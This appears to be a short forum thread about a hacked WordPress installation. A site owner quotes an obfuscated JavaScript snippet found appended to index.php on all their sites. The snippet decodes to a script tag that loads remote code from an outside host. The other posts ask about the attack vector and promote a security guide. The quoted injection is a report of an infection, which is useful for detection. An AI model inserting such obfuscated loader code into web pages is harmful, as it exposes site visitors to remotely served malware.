I found this at the bottom of the index.php on every single one of my sites: <!-- ad --><html> <script> r=0;while(r<83)document.write(String.fromCharCode('=tdsjqu!mbohvbhf>#KbwbTdsjqu#!tsd>#iuuq;00xxx/hbcuvof/dp/dd0uvof0tubu/kt#?=0tdsjqu?'.charCodeAt(r++)-1)) </script> </html> <!-- /ad --><script>check_content()</script>
Any news on the actual attack vector? Are they hacking WP directly or getting in through other means and just greping for WP installations?
This is a very common hack nowadays. Don't be a victim, read this Wordpress Security Guide with free information, plugins, and tools to secure and harden your WP blog so these things don't happen to you.